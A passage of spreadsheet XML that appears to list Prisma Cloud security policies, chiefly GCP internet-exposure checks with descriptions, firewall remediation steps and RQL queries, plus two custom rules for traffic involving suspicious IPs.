          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3488" s="2" t="inlineStr"/>
      <c r="D3488" t="inlineStr"/>
      <c r="E3488" t="inlineStr"/>
      <c r="F3488" t="inlineStr"/>
      <c r="G3488" t="b">
        <v>1</v>
      </c>
      <c r="H348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88" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J3488" t="inlineStr">
        <is>
          <t>network_exposure</t>
        </is>
      </c>
      <c r="K3488" t="inlineStr">
        <is>
          <t>GCP GKE K8s service with network path from the internet (0.0.0.0/0) on ports 80/443</t>
        </is>
      </c>
      <c r="L3488" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M3488" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N3488" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3488" t="inlineStr">
        <is>
          <t>network</t>
        </is>
      </c>
      <c r="P3488" t="inlineStr">
        <is>
          <t>network_config</t>
        </is>
      </c>
      <c r="Q3488" t="inlineStr"/>
      <c r="R3488" t="inlineStr"/>
      <c r="S3488" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T3488" t="b">
        <v>0</v>
      </c>
      <c r="U3488" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3488" t="inlineStr">
        <is>
          <t>network_exposure</t>
        </is>
      </c>
      <c r="W3488" t="inlineStr">
        <is>
          <t>This policy identifies GCP GKE Kubernetes services that have network paths open to the internet (0.0.0.0/0) on ports 80 or 443.
Exposing container services to the internet increases the risk of unauthorized access, cyber attacks, and data breaches by expanding the attack surface for malicious actors. Services open on ports 80 and 443, which are used for HTTP and HTTPS protocols, are particularly vulnerable to attacks such as brute force attempts, vulnerability exploits, cross-site scripting (XSS), SQL injections, cross-site request forgeries (CSRF), and DDoS attacks.
As a best practice, restrict traffic from unknown IP addresses and limit access to trusted hosts, services, or specific entities.</t>
        </is>
      </c>
      <c r="X3488" t="inlineStr">
        <is>
          <t>The following steps are recommended to restrict GKE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necessary changes and ensure no other resources have been impacted due to these changes:
a) The overly permissive firewall rules can be made more restrictive.
b) Move the container/application inside a restrictive subnet if public accessibility is not required.
c) Remove or disassociate the public IP assigned to the respective container.</t>
        </is>
      </c>
      <c r="Y3488" t="inlineStr"/>
      <c r="Z3488" t="inlineStr">
        <is>
          <t>config from network where source.network = '0.0.0.0/0' and address.match.criteria = 'full_match' and dest.resource.type = 'K8s Service' and dest.cloud.type = 'GCP' and protocol.ports in ( 'tcp/80' , 'tcp/443' )</t>
        </is>
      </c>
      <c r="AA3488" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3488" t="inlineStr">
        <is>
          <t>2024-11-11 04:27:06</t>
        </is>
      </c>
      <c r="AC3488" t="inlineStr">
        <is>
          <t>PC-ALL-ALL-1302</t>
        </is>
      </c>
      <c r="AD3488" t="b">
        <v>1</v>
      </c>
      <c r="AE3488" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3488" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG348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88" t="inlineStr">
        <is>
          <t>eaa68a6c-3fc2-4db7-ab21-aaae613f8b28</t>
        </is>
      </c>
      <c r="AI3488" t="inlineStr">
        <is>
          <t>c7838fab-5f3c-46a6-b160-663577a0c5cf</t>
        </is>
      </c>
      <c r="AJ3488" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3488" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3489">
      <c r="A3489" t="inlineStr"/>
      <c r="B3489" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3489" s="2" t="inlineStr"/>
      <c r="D3489" t="inlineStr"/>
      <c r="E3489" t="inlineStr"/>
      <c r="F3489" t="inlineStr"/>
      <c r="G3489" t="b">
        <v>1</v>
      </c>
      <c r="H348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89" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J3489" t="inlineStr">
        <is>
          <t>network_exposure</t>
        </is>
      </c>
      <c r="K3489" t="inlineStr">
        <is>
          <t>GCP VM instance with network path from the internet (0.0.0.0/0) on ports 80/443</t>
        </is>
      </c>
      <c r="L3489" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M3489" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N3489" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3489" t="inlineStr">
        <is>
          <t>network</t>
        </is>
      </c>
      <c r="P3489" t="inlineStr">
        <is>
          <t>network_config</t>
        </is>
      </c>
      <c r="Q3489" t="inlineStr"/>
      <c r="R3489" t="inlineStr"/>
      <c r="S3489" t="inlineStr">
        <is>
          <t>Attack Path Rule,network_config</t>
        </is>
      </c>
      <c r="T3489" t="b">
        <v>0</v>
      </c>
      <c r="U3489" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3489" t="inlineStr">
        <is>
          <t>network_exposure</t>
        </is>
      </c>
      <c r="W3489" t="inlineStr">
        <is>
          <t>This policy identifies GCP VM instances with network path from the internet (0.0.0.0/0) on ports 80/443.
GCP VM instances with network path from the internet increases the risk of unauthorized access, cyber attacks, and data breaches, as it may provide a larger attack surface for malicious actors. Such instances are especially prone to brute force or vulnerability exploits. Port 80 and 443 are frequently targeted ports and utilized for HTTP and HTTPS protocols, making them susceptible to attacks like cross-site scripting, SQL injections, cross-site request forgeries, and DDoS attacks.
As a best practice, restrict traffic from unknown IP addresses and limit the access from known hosts, services, or specific entities.</t>
        </is>
      </c>
      <c r="X3489" t="inlineStr">
        <is>
          <t>Restrict access to GCP VM instance by modifying VPC Firewall rules
1. Login to the GCP Console
2. Go to 'VM instance'
3. Identify the VM instance that you want to restrict Internet access
4. Update the VPC firewall rule that allows Internet access (0.0.0.0/0) on ports 80/443 to a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t>
        </is>
      </c>
      <c r="Y3489" t="inlineStr"/>
      <c r="Z3489" t="inlineStr">
        <is>
          <t>config from network where source.network = '0.0.0.0/0' and address.match.criteria = 'full_match' and dest.resource.type = 'Instance' and dest.cloud.type = 'GCP' and protocol.ports in ( 'tcp/80' , 'tcp/443' )</t>
        </is>
      </c>
      <c r="AA3489" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3489" t="inlineStr">
        <is>
          <t>2024-08-19 06:32:45</t>
        </is>
      </c>
      <c r="AC3489" t="inlineStr">
        <is>
          <t>PC-ALL-ALL-1076</t>
        </is>
      </c>
      <c r="AD3489" t="b">
        <v>1</v>
      </c>
      <c r="AE3489" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3489" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG348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89" t="inlineStr">
        <is>
          <t>e8b7c97a-f422-47ce-9b28-a096a3cff423</t>
        </is>
      </c>
      <c r="AI3489" t="inlineStr">
        <is>
          <t>4d4bfc55-1b36-40a7-813f-cde5671fd641</t>
        </is>
      </c>
      <c r="AJ3489" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3489" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3490">
      <c r="A3490" t="inlineStr"/>
      <c r="B3490" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3490" s="2" t="inlineStr"/>
      <c r="D3490" t="n">
        <v>1178</v>
      </c>
      <c r="E3490" t="n">
        <v>0</v>
      </c>
      <c r="F3490" t="n">
        <v>121</v>
      </c>
      <c r="G3490" t="b">
        <v>1</v>
      </c>
      <c r="H349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90" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J3490" t="inlineStr">
        <is>
          <t>network_exposure</t>
        </is>
      </c>
      <c r="K3490" t="inlineStr">
        <is>
          <t>GCP VM instance with network path from the internet (0.0.0.0/0) on Admin ports</t>
        </is>
      </c>
      <c r="L3490" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M3490" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N3490" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3490" t="inlineStr">
        <is>
          <t>network</t>
        </is>
      </c>
      <c r="P3490" t="inlineStr">
        <is>
          <t>network_config</t>
        </is>
      </c>
      <c r="Q3490" t="inlineStr"/>
      <c r="R3490" t="inlineStr"/>
      <c r="S3490" t="inlineStr">
        <is>
          <t>Attack Path Rule,network_config,Prisma_Cloud</t>
        </is>
      </c>
      <c r="T3490" t="b">
        <v>0</v>
      </c>
      <c r="U3490" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3490" t="inlineStr">
        <is>
          <t>network_exposure</t>
        </is>
      </c>
      <c r="W3490" t="inlineStr">
        <is>
          <t>This policy identifies GCP VM instances with network path from the internet (0.0.0.0/0) on ports 22/3389.
GCP VM instances with network path from the internet increases the risk of unauthorized access, cyber attacks, and data breaches, as it may provide a larger attack surface for malicious actors. Such instances are especially prone to brute force or vulnerability exploits. Port 22 and 2289 are frequently targeted ports and utilized for remote access using SSH and RDP protocols respectively, making them susceptible to attacks like brute force and vulnerability exposure/exploitation.
As a best practice, restrict traffic from unknown IP addresses and limit the access from known hosts, services, or specific entities.</t>
        </is>
      </c>
      <c r="X3490" t="inlineStr">
        <is>
          <t>Restrict access to GCP VM instance by modifying VPC Firewall rules
1. Login to the GCP Console
2. Go to 'VM instance'
3. Identify the VM instance that you want to restrict Internet access
4. Update the VPC firewall rule that allows Internet access (0.0.0.0/0) on ports 22/3389 to a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t>
        </is>
      </c>
      <c r="Y3490" t="inlineStr"/>
      <c r="Z3490" t="inlineStr">
        <is>
          <t>config from network where source.network = '0.0.0.0/0' and address.match.criteria = 'full_match' and dest.resource.type = 'Instance' and dest.cloud.type = 'GCP' and dest.resource.state = 'Active' and protocol.ports in ( 'tcp/22', 'tcp/3389' )</t>
        </is>
      </c>
      <c r="AA3490" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3490" t="inlineStr">
        <is>
          <t>2024-08-19 06:32:45</t>
        </is>
      </c>
      <c r="AC3490" t="inlineStr">
        <is>
          <t>PC-ALL-ALL-1019</t>
        </is>
      </c>
      <c r="AD3490" t="b">
        <v>1</v>
      </c>
      <c r="AE3490" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3490" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG349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0" t="inlineStr">
        <is>
          <t>2a07903d-9538-42ab-a3cd-80ce68fa9bf7</t>
        </is>
      </c>
      <c r="AI3490" t="inlineStr">
        <is>
          <t>829dce41-2c85-4d07-abf5-171a4c529792</t>
        </is>
      </c>
      <c r="AJ3490" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3490" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3491">
      <c r="A3491" t="inlineStr"/>
      <c r="B3491" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3491" s="2" t="inlineStr"/>
      <c r="D3491" t="inlineStr"/>
      <c r="E3491" t="inlineStr"/>
      <c r="F3491" t="inlineStr"/>
      <c r="G3491" t="b">
        <v>0</v>
      </c>
      <c r="H349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test-dish, test-ebs, test-ebs-1, test-mms-may-15, test-yor-tushir, test1_alert_rules_20231006, testrule, testrule1, tushir-dell</t>
        </is>
      </c>
      <c r="I3491" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J3491" t="inlineStr">
        <is>
          <t>network_exposure</t>
        </is>
      </c>
      <c r="K3491" t="inlineStr">
        <is>
          <t>GCP VM instance with network path from the internet (0.0.0.0/0)</t>
        </is>
      </c>
      <c r="L3491" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M3491" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N3491" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3491" t="inlineStr">
        <is>
          <t>network</t>
        </is>
      </c>
      <c r="P3491" t="inlineStr">
        <is>
          <t>network_config</t>
        </is>
      </c>
      <c r="Q3491" t="inlineStr"/>
      <c r="R3491" t="inlineStr"/>
      <c r="S3491" t="inlineStr">
        <is>
          <t>Attack Path Rule,network_config,Prisma_Cloud</t>
        </is>
      </c>
      <c r="T3491" t="b">
        <v>0</v>
      </c>
      <c r="U3491" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3491" t="inlineStr">
        <is>
          <t>network_exposure</t>
        </is>
      </c>
      <c r="W3491" t="inlineStr">
        <is>
          <t>This policy identifies GCP VM instances with network path from the internet (0.0.0.0/0).
GCP VM instances with network path from the internet increases the risk of unauthorized access, cyber attacks, and data breaches, as it may provide a larger attack surface for malicious actors. Such instances are especially prone to brute force or vulnerability exploits.
As a best practice, restrict traffic from unknown IP addresses and limit the access from known hosts, services, or specific entities.</t>
        </is>
      </c>
      <c r="X3491" t="inlineStr">
        <is>
          <t>Restrict access to GCP VM instance by modifying VPC Firewall rules
1. Login to the GCP Console
2. Go to 'VM instance'
3. Identify the VM instance that you want to restrict Internet access
4. Update the VPC firewall rule that allows Internet access (0.0.0.0/0) to a trusted IP address
Refer to the following links for detailed steps to modify VPC firewall rules,
- To list VPC firewall rules for a network interface of a VM instance
https://cloud.google.com/firewall/docs/using-firewalls#listing-rules-vm
- To Update VPC firewall rules
https://cloud.google.com/firewall/docs/using-firewalls#updating_firewall_rules
NOTE: When modifying Network security group rules, ensure that you don't lock yourself out of the instances. Always have a rule that allows you to access them for management purposes.</t>
        </is>
      </c>
      <c r="Y3491" t="inlineStr"/>
      <c r="Z3491" t="inlineStr">
        <is>
          <t>config from network where source.network = '0.0.0.0/0' and address.match.criteria = 'full_match' and dest.resource.type = 'Instance' and dest.cloud.type = 'GCP' and dest.resource.state = 'Active'</t>
        </is>
      </c>
      <c r="AA3491" t="inlineStr">
        <is>
          <t>Ivaylo Kirilov</t>
        </is>
      </c>
      <c r="AB3491" t="inlineStr">
        <is>
          <t>2024-10-08 20:31:32</t>
        </is>
      </c>
      <c r="AC3491" t="inlineStr">
        <is>
          <t>PC-ALL-ALL-1010</t>
        </is>
      </c>
      <c r="AD3491" t="b">
        <v>1</v>
      </c>
      <c r="AE3491" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3491" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG349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test-dish - Notifications:, AccountGroups:avega-active-directory,Default Account Group,Pramm-XSIAM,Test_Praveen_Webinar2,schwab test,Lsekar-AWSAccount,rsam-anz-parent-group,jasonkimaccountgroup,mdavis1 Azure Alert Test account group,ebarragan_account_group,Testing - 630918272677,test_aws_account_group,jmontufar.org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1" t="inlineStr">
        <is>
          <t>92cd237f-ccd7-4d60-aeb7-33c95b9f056a</t>
        </is>
      </c>
      <c r="AI3491" t="inlineStr">
        <is>
          <t>77bff382-c425-496a-b0de-6e21d8556549</t>
        </is>
      </c>
      <c r="AJ3491" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3491" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3492">
      <c r="A3492" t="inlineStr"/>
      <c r="B3492" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3492" s="2" t="inlineStr"/>
      <c r="D3492" t="inlineStr"/>
      <c r="E3492" t="inlineStr"/>
      <c r="F3492" t="inlineStr"/>
      <c r="G3492" t="b">
        <v>1</v>
      </c>
      <c r="H349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92" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J3492" t="inlineStr">
        <is>
          <t>network_exposure</t>
        </is>
      </c>
      <c r="K3492" t="inlineStr">
        <is>
          <t>GCP GKE K8s service with network path from the untrust internet source on ports with high risk</t>
        </is>
      </c>
      <c r="L3492" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M3492" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N3492" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3492" t="inlineStr">
        <is>
          <t>network</t>
        </is>
      </c>
      <c r="P3492" t="inlineStr">
        <is>
          <t>network_config</t>
        </is>
      </c>
      <c r="Q3492" t="inlineStr"/>
      <c r="R3492" t="inlineStr"/>
      <c r="S3492" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T3492" t="b">
        <v>0</v>
      </c>
      <c r="U3492" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3492" t="inlineStr">
        <is>
          <t>network_exposure</t>
        </is>
      </c>
      <c r="W3492" t="inlineStr">
        <is>
          <t>This policy identifies GCP GKE Kubernetes services with network paths from untrusted internet sources on ports with high risk.
GCP GKE Kubernetes services exposed to untrusted internet sources on high-risk ports increase the risk of unauthorized access, cyber-attacks, and data breaches, as they present a larger attack surface for malicious actors. These container services are particularly vulnerable to brute force attacks and exploits targeting known vulnerabilities.
As a best practice, it is recommended to allow access only from a Trusted IP list and to limit access to known hosts, services, or specific entities.
Note: Prisma Cloud's Trusted IP List feature allows administrators to specify a list of IP addresses that are considered trusted or safe.</t>
        </is>
      </c>
      <c r="X3492" t="inlineStr">
        <is>
          <t>The following steps are recommended to restrict GKE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necessary changes and ensure no other resources have been impacted due to these changes:
a) The overly permissive firewall rules can be made more restrictive.
b) Move the container/application inside a restrictive subnet if public accessibility is not required.
c) Remove or disassociate the public IP assigned to the respective container.</t>
        </is>
      </c>
      <c r="Y3492" t="inlineStr"/>
      <c r="Z3492" t="inlineStr">
        <is>
          <t>config from network where source.network = UNTRUST_INTERNET and dest.resource.type = 'K8s Service' and dest.cloud.type = 'GCP' and protocol.ports in ( 'tcp/20:21', 'tcp/23', 'tcp/25', 'tcp/110', 'tcp/135', 'tcp/143', 'tcp/445', 'tcp/1433:1434', 'tcp/3000', 'tcp/3306', 'tcp/4333', 'tcp/5000', 'tcp/5432', 'tcp/5500', 'tcp/5601', 'tcp/8080', 'tcp/8088', 'tcp/8888', 'tcp/9200', 'tcp/9300' )</t>
        </is>
      </c>
      <c r="AA3492" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3492" t="inlineStr">
        <is>
          <t>2024-11-11 04:27:09</t>
        </is>
      </c>
      <c r="AC3492" t="inlineStr">
        <is>
          <t>PC-ALL-ALL-1305</t>
        </is>
      </c>
      <c r="AD3492" t="b">
        <v>1</v>
      </c>
      <c r="AE3492" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3492" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG349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92" t="inlineStr">
        <is>
          <t>694194b8-f378-4c84-953f-78222fccefed</t>
        </is>
      </c>
      <c r="AI3492" t="inlineStr">
        <is>
          <t>1a917c27-5ff6-423a-8812-97edbdb61286</t>
        </is>
      </c>
      <c r="AJ3492" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3492" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3493">
      <c r="A3493" t="inlineStr"/>
      <c r="B3493" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3493" s="2" t="inlineStr"/>
      <c r="D3493" t="n">
        <v>5</v>
      </c>
      <c r="E3493" t="n">
        <v>0</v>
      </c>
      <c r="F3493" t="n">
        <v>0</v>
      </c>
      <c r="G3493" t="b">
        <v>1</v>
      </c>
      <c r="H349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3" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J3493" t="inlineStr">
        <is>
          <t>network_exposure</t>
        </is>
      </c>
      <c r="K3493" t="inlineStr">
        <is>
          <t>GCP GKE K8s service with network path from the internet (0.0.0.0/0)</t>
        </is>
      </c>
      <c r="L3493" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M3493" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N3493" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3493" t="inlineStr">
        <is>
          <t>network</t>
        </is>
      </c>
      <c r="P3493" t="inlineStr">
        <is>
          <t>network_config</t>
        </is>
      </c>
      <c r="Q3493" t="inlineStr"/>
      <c r="R3493" t="inlineStr"/>
      <c r="S3493" t="inlineStr">
        <is>
          <t>Attack Path Rule,Prisma_Cloud</t>
        </is>
      </c>
      <c r="T3493" t="b">
        <v>0</v>
      </c>
      <c r="U3493" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3493" t="inlineStr">
        <is>
          <t>network_exposure</t>
        </is>
      </c>
      <c r="W3493" t="inlineStr">
        <is>
          <t>This policy identifies GCP GKE K8s services with network path from the internet (0.0.0.0/0).
Container services exposed to the internet increases the risk of unauthorized access, cyber attacks, and data breaches, as they present a larger attack surface for malicious actors. These services are particularly vulnerable to brute force attacks and exploitation of known vulnerabilities.
As a best practice, restrict traffic from unknown IP addresses and limit access to trusted hosts, services, or specific entities.</t>
        </is>
      </c>
      <c r="X3493" t="inlineStr">
        <is>
          <t>The following steps are recommended to restrict GKE K8s service from having unrestricted access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firewall rules can be made more restrictive.
 b) Move the container/app inside a restrictive subnet if it does not need to be publicly accessible.
 c) Restrict the IP addresses or IP ranges that can access your service.</t>
        </is>
      </c>
      <c r="Y3493" t="inlineStr"/>
      <c r="Z3493" t="inlineStr">
        <is>
          <t>config from network where source.network = '0.0.0.0/0' and address.match.criteria = 'full_match' and dest.resource.type = 'K8s Service' and dest.cloud.type = 'GCP' and effective.action = 'Allow'</t>
        </is>
      </c>
      <c r="AA3493" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3493" t="inlineStr">
        <is>
          <t>2024-10-14 06:35:06</t>
        </is>
      </c>
      <c r="AC3493" t="inlineStr">
        <is>
          <t>PC-ALL-ALL-1074</t>
        </is>
      </c>
      <c r="AD3493" t="b">
        <v>1</v>
      </c>
      <c r="AE3493" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3493" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG349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3" t="inlineStr">
        <is>
          <t>5aa953c3-7ed0-4c74-bf00-64e3aa4caa19</t>
        </is>
      </c>
      <c r="AI3493" t="inlineStr">
        <is>
          <t>ab74ad21-1079-492e-a6ae-0f17b563d7dc</t>
        </is>
      </c>
      <c r="AJ3493" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3493" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3494">
      <c r="A3494" t="inlineStr"/>
      <c r="B3494" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C3494" s="2" t="inlineStr"/>
      <c r="D3494" t="inlineStr"/>
      <c r="E3494" t="inlineStr"/>
      <c r="F3494" t="inlineStr"/>
      <c r="G3494" t="b">
        <v>0</v>
      </c>
      <c r="H349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4" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J3494" t="inlineStr">
        <is>
          <t>vpc.flow_record</t>
        </is>
      </c>
      <c r="K3494" t="inlineStr">
        <is>
          <t>Intances that sent traffic to supicious ip addresses</t>
        </is>
      </c>
      <c r="L3494" t="inlineStr"/>
      <c r="M3494" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N3494" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O3494" t="inlineStr">
        <is>
          <t>network</t>
        </is>
      </c>
      <c r="P3494" t="inlineStr">
        <is>
          <t>network_event</t>
        </is>
      </c>
      <c r="Q3494" t="inlineStr"/>
      <c r="R3494" t="inlineStr"/>
      <c r="S3494" t="inlineStr"/>
      <c r="T3494" t="b">
        <v>0</v>
      </c>
      <c r="U3494" t="inlineStr">
        <is>
          <t>network_protection</t>
        </is>
      </c>
      <c r="V3494" t="inlineStr">
        <is>
          <t>vpc.flow_record</t>
        </is>
      </c>
      <c r="W3494" t="inlineStr">
        <is>
          <t>Intances that sent traffic to supicious ip addresses test willixmorax</t>
        </is>
      </c>
      <c r="X3494" t="inlineStr"/>
      <c r="Y3494" t="inlineStr"/>
      <c r="Z3494" t="inlineStr">
        <is>
          <t>network from vpc.flow_record where dest.publicnetwork = 'Suspicious IPs' AND source.resource IN ( resource where role IN ( 'VM Instance', 'Web Server' ))</t>
        </is>
      </c>
      <c r="AA3494" t="inlineStr">
        <is>
          <t>Brandon Goldstein</t>
        </is>
      </c>
      <c r="AB3494" t="inlineStr">
        <is>
          <t>2024-09-13 17:16:48</t>
        </is>
      </c>
      <c r="AC3494" t="inlineStr"/>
      <c r="AD3494" t="b">
        <v>0</v>
      </c>
      <c r="AE3494" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF3494" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG349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4" t="inlineStr">
        <is>
          <t>1e7efefd-5a46-4b97-a997-d4222f42692d</t>
        </is>
      </c>
      <c r="AI3494" t="inlineStr">
        <is>
          <t>f6369226-1adc-4711-88b5-653178446302</t>
        </is>
      </c>
      <c r="AJ3494" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3494" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3495">
      <c r="A3495" t="inlineStr"/>
      <c r="B3495" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C3495" s="2" t="inlineStr"/>
      <c r="D3495" t="inlineStr"/>
      <c r="E3495" t="inlineStr"/>
      <c r="F3495" t="inlineStr"/>
      <c r="G3495" t="b">
        <v>0</v>
      </c>
      <c r="H349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5" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
      <c r="J3495" t="inlineStr">
        <is>
          <t>vpc.flow_record</t>
        </is>
      </c>
      <c r="K3495" t="inlineStr">
        <is>
          <t>Suspicious IPs</t>
        </is>
      </c>
      <c r="L3495" t="inlineStr"/>
      <c r="M3495" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N3495" t="inlineStr">
        <is>
          <t>APP2 Prisma Cloud Customer Success Lab- 5418164167018798048</t>
        </is>
      </c>
      <c r="O3495" t="inlineStr">
        <is>
          <t>network</t>
        </is>
      </c>
      <c r="P3495" t="inlineStr">
        <is>
          <t>network_event</t>
        </is>
      </c>
      <c r="Q3495" t="inlineStr"/>
      <c r="R3495" t="inlineStr"/>
      <c r="S3495" t="inlineStr"/>
      <c r="T3495" t="b">
        <v>0</v>
      </c>
      <c r="U3495" t="inlineStr">
        <is>
          <t>network_protection</t>
        </is>
      </c>
      <c r="V3495" t="inlineStr">
        <is>
          <t>vpc.flow_record</t>
        </is>
      </c>
      <c r="W3495" t="inlineStr"/>
      <c r="X3495" t="inlineStr"/>
      <c r="Y3495" t="inlineStr"/>
      <c r="Z3495" t="inlineStr">
        <is>
          <t>network from vpc.flow_record where source.publicnetwork = 'Suspicious IPs' AND bytes &gt; 0</t>
        </is>
      </c>
      <c r="AA3495" t="inlineStr">
        <is>
          <t>Brandon Goldstein</t>
        </is>
      </c>
      <c r="AB3495" t="inlineStr">
        <is>
          <t>2024-09-13 17:21:41</t>
        </is>
      </c>
      <c r="AC3495" t="inlineStr"/>
      <c r="AD3495" t="b">
        <v>0</v>
      </c>
      <c r="AE3495" t="inlineStr">
        <is>
          <t>custom</t>
        </is>
      </c>
      <c r="AF3495" t="inlineStr">
        <is>
          <t>incident</t>
        </is>
      </c>
      <c r="AG349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5" t="inlineStr">
        <is>
          <t>b1da94b4-a516-4440-8c02-b6db42edf67b</t>
        </is>
      </c>
      <c r="AI3495" t="inlineStr">
        <is>
          <t>fbdbe32c-b144-43c1-9a05-8f692fc1c153</t>
        </is>
      </c>
      <c r="AJ3495" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3495" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3496">
      <c r="A3496" t="inlineStr">
        <is>
          <t>CIS v1.4.0 (AWS)</t>
        </is>
      </c>
      <c r="B3496" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C3496" s="2" t="inlineStr"/>
      <c r="D3496" t="inlineStr"/>
      <c r="E3496" t="inlineStr"/>
      <c r="F3496" t="inlineStr"/>
      <c r="G3496" t="b">
        <v>0</v>
      </c>
      <c r="H349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6" t="inlineStr">
        <is>
          <t>all</t>
        </is>
      </c>
